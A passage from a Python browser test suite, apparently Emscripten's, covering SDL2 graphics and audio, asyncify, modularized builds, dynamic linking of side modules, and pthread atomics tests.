message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
test_file('webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
